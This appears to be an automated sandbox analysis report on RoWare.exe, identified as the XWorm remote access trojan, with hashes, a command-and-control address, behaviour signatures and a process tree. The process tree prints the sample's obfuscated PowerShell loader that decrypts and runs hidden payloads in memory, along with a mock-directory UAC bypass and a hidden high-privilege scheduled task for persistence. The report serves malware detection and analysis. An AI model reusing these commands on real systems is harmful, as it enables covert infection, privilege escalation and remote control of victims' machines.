Overview

overview

10

Static

static

3

RoWare.exe

windows10-1703-x64

10

RoWare.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    16s
  • max time network
    33s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    03/09/2024, 16:15

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    RoWare.exe

  • Size

    472KB

  • MD5

    b63bed7f19631126a453b49d603c74a4

  • SHA1

    abd90b6cbda580c135e1b28b89d4f0027f939225

  • SHA256

    2367f924d3eeb65eac13f2fef2c92ae901605323ae0e3c91b24a8c0717c1829a

  • SHA512

    29aa82c4c201512b4ebacc3ea1725bdb8207fe56ae68c7b7620da9b619b8cf1801fa5488f47863d46c056066eb559a3c0c887c46fd816890c9e9d4a2a32f192d

  • SSDEEP

    12288:Qy90sdnp4C4BytE9WlGKfmQgNsP/N6aSg5U2D:Qy1dpF44osGKfmQEwOg5h

Score
10/10
xwormdefense_evasionexecutionpersistenceprivilege_escalationrattrojan

Malware Config

Extracted

Family

xworm

C2

91.92.250.4:2709

Attributes
  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
    1⤵
      PID:720
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k DcomLaunch
      1⤵
        PID:808
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k rpcss
        1⤵
          PID:856
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
          1⤵
            PID:904
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
            1⤵
              PID:360
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:604
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                1⤵
                  PID:392
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                  1⤵
                    PID:1068
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                    1⤵
                      PID:1080
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1120
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservice -s nsi
                        1⤵
                          PID:1196
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1212
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                            1⤵
                              PID:1232
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservice -s EventSystem
                              1⤵
                                PID:1260
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                                1⤵
                                  PID:1384
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                  1⤵
                                    PID:1444
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                    1⤵
                                      PID:1464
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                      1⤵
                                        PID:1508
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                        1⤵
                                          PID:1532
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                          1⤵
                                            PID:1572
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                            1⤵
                                              PID:1648
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k localservice -s netprofm
                                              1⤵
                                                PID:1728
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                1⤵
                                                  PID:1756
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                  1⤵
                                                    PID:1772
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                    1⤵
                                                      PID:1860
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                      1⤵
                                                        PID:1872
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                        1⤵
                                                          PID:1676
                                                        • c:\windows\system32\svchost.exe
                                                          c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                          1⤵
                                                            PID:2316
                                                          • c:\windows\system32\svchost.exe
                                                            c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                            1⤵
                                                              PID:2340
                                                            • c:\windows\system32\svchost.exe
                                                              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                              1⤵
                                                                PID:2348
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                1⤵
                                                                  PID:2388
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                  1⤵
                                                                    PID:2404
                                                                  • c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                    1⤵
                                                                      PID:2452
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                      1⤵
                                                                        PID:2464
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                        1⤵
                                                                          PID:2488
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                          1⤵
                                                                            PID:2892
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2936
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                              1⤵
                                                                                PID:2676
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:3316
                                                                                • C:\Users\Admin\AppData\Local\Temp\RoWare.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\RoWare.exe"
                                                                                  2⤵
                                                                                  • Adds Run key to start application
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:4192
                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                    cmd /c "RoWare.bat"
                                                                                    3⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:5104
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      cmd /c "set __=^&rem"
                                                                                      4⤵
                                                                                        PID:4620
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RoWare.bat';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                        4⤵
                                                                                          PID:192
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3548
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2092
                                                                                            • C:\Windows \System32\ComputerDefaults.exe
                                                                                              "C:\Windows \System32\ComputerDefaults.exe"
                                                                                              6⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4104
                                                                                              • C:\Windows\System32\ie4uinit.exe
                                                                                                "C:\Windows\System32\ie4uinit.exe" -reinstall
                                                                                                7⤵
                                                                                                • Boot or Logon Autostart Execution: Active Setup
                                                                                                • Modifies Internet Explorer settings
                                                                                                • Modifies registry class
                                                                                                PID:2480
                                                                                              • C:\Windows\system32\unregmp2.exe
                                                                                                C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
                                                                                                7⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Modifies registry class
                                                                                                PID:3180
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
                                                                                            5⤵
                                                                                              PID:1792
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RoWare')
                                                                                              5⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3516
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4204
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                      1⤵
                                                                                        PID:4868
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                        1⤵
                                                                                          PID:4692
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                          1⤵
                                                                                            PID:508
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                            1⤵
                                                                                              PID:4468

                                                                                            Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    ad5cd538ca58cb28ede39c108acb5785

                                                                                                    SHA1

                                                                                                    1ae910026f3dbe90ed025e9e96ead2b5399be877

                                                                                                    SHA256

                                                                                                    c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                                                                                                    SHA512

                                                                                                    c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                    Filesize

                                                                                                    1KB

                                                                                                    MD5

                                                                                                    50ede7a722da61c923943566716d04a7

                                                                                                    SHA1

                                                                                                    c487c8973884b7881dc752f7dded6da0063284b2

                                                                                                    SHA256

                                                                                                    872cfd31704018b30be0c62ad32e1780ef5f89ca99166966f8a9d9eddffb27a4

                                                                                                    SHA512

                                                                                                    bb16ca2e083c6d72a5a5388158a122d3544a6065bde76000ea990e52807699ee75d371072bec1812e2ccf1db5da201975ff2ba9c6821a6d8b54f3315829cb64d

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RoWare.bat
                                                                                                    Filesize

                                                                                                    399KB

                                                                                                    MD5

                                                                                                    472de93de365167459958b7ce29f610e

                                                                                                    SHA1

                                                                                                    7a7ace619fbd8569c2982fb1fc44aa4b6040f351

                                                                                                    SHA256

                                                                                                    5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde

                                                                                                    SHA512

                                                                                                    03fc1017200c386cbe36050f5014c644edd57864ba1f7b88e5ab497d616ba3ec658ee8d690efde5544fe3befe569f3365e4d64f3b276245967193527e3b17f6a

                                                                                                    Download Submit

                                                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0tqkmbht.r4v.ps1
                                                                                                    Filesize

                                                                                                    1B

                                                                                                    MD5

                                                                                                    c4ca4238a0b923820dcc509a6f75849b

                                                                                                    SHA1

                                                                                                    356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                    SHA256

                                                                                                    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                    SHA512

                                                                                                    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                    Download Submit

                                                                                                  • C:\Windows \System32\ComputerDefaults.exe
                                                                                                    Filesize

                                                                                                    72KB

                                                                                                    MD5

                                                                                                    56d03e4218082266a9cdd8600537d891

                                                                                                    SHA1

                                                                                                    c153719f971dcee8f6985d7c79f64fc88dd8663c

                                                                                                    SHA256

                                                                                                    210d5714497505022aa068167f7ed5bb826abcf53cfe741c9860a2c8dce3f54a

                                                                                                    SHA512

                                                                                                    f2c64a4dbab789635bf97b3d615fcc96dfe8c4094b67a464eb34bc84501eb7648e7fa692971e917c1ebfac0548187721ecc552aaad35767f8a40846d922613d3

                                                                                                    Download Submit

                                                                                                  • memory/360-202-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/392-195-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1120-207-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1232-199-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1508-209-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1532-197-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1572-196-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1728-198-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1756-201-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/1772-194-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2316-206-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2340-205-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2348-200-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2404-236-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2892-235-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/2936-203-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3316-172-0x0000000002700000-0x000000000272A000-memory.dmp

                                                                                                    Filesize

                                                                                                    168KB

                                                                                                    Download

                                                                                                  • memory/3316-193-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3548-61-0x00007FFB79180000-0x00007FFB7935B000-memory.dmp

                                                                                                    Filesize

                                                                                                    1.9MB

                                                                                                    Download

                                                                                                  • memory/3548-62-0x00007FFB77EC0000-0x00007FFB77F6E000-memory.dmp

                                                                                                    Filesize

                                                                                                    696KB

                                                                                                    Download

                                                                                                  • memory/3548-190-0x00000298F4B80000-0x00000298F4B94000-memory.dmp

                                                                                                    Filesize

                                                                                                    80KB

                                                                                                    Download

                                                                                                  • memory/3548-79-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

                                                                                                    Filesize

                                                                                                    9.9MB

                                                                                                    Download

                                                                                                  • memory/3548-78-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                    Download

                                                                                                  • memory/3548-71-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

                                                                                                    Filesize

                                                                                                    9.9MB

                                                                                                    Download

                                                                                                  • memory/3548-63-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

                                                                                                    Filesize

                                                                                                    9.9MB

                                                                                                    Download

                                                                                                  • memory/3548-6-0x00007FFB5D423000-0x00007FFB5D424000-memory.dmp

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                    Download

                                                                                                  • memory/3548-64-0x00000298F4A00000-0x00000298F4A4C000-memory.dmp

                                                                                                    Filesize

                                                                                                    304KB

                                                                                                    Download

                                                                                                  • memory/3548-98-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

                                                                                                    Filesize

                                                                                                    9.9MB

                                                                                                    Download

                                                                                                  • memory/3548-60-0x00000298F40F0000-0x00000298F4100000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/3548-8-0x00000298F4080000-0x00000298F40A2000-memory.dmp

                                                                                                    Filesize

                                                                                                    136KB

                                                                                                    Download

                                                                                                  • memory/3548-59-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

                                                                                                    Filesize

                                                                                                    9.9MB

                                                                                                    Download

                                                                                                  • memory/3548-50-0x00000298F47A0000-0x00000298F4816000-memory.dmp

                                                                                                    Filesize

                                                                                                    472KB

                                                                                                    Download

                                                                                                  • memory/3548-49-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

                                                                                                    Filesize

                                                                                                    9.9MB

                                                                                                    Download

                                                                                                  • memory/3548-38-0x00000298F4100000-0x00000298F413C000-memory.dmp

                                                                                                    Filesize

                                                                                                    240KB

                                                                                                    Download

                                                                                                  • memory/3548-13-0x00007FFB5D420000-0x00007FFB5DE0C000-memory.dmp

                                                                                                    Filesize

                                                                                                    9.9MB

                                                                                                    Download

                                                                                                  • memory/4692-204-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download

                                                                                                  • memory/4868-208-0x00007FFB39210000-0x00007FFB39220000-memory.dmp

                                                                                                    Filesize

                                                                                                    64KB

                                                                                                    Download